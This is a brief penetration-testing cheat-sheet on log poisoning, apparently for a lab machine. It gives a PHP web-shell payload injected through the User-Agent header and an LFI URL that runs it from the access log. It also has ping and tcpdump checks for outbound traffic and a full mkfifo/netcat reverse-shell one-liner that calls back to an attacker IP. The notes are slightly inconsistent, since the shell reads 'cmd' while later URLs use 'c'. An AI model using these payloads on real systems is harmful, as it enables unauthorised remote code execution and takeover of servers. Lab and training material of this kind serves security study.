Log Poisoning

User-Agent poisoning

• allow_url_fopen needs to be On

• If the access_log is exposed and the server is not properly sanitizing or validating the User-Agent:

User-Agent: tokyo: <?php system($_GET['cmd']); ?>

• From here, just visit the URL

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id

• Use ping to check if it's possible to generate outbound network traffic back to the host:

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.16.8

• Catch it with tcpmdump

tcpdump -i tun0 icmp

• Get a reverse shell:

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.8%204444%20%3E/tmp/f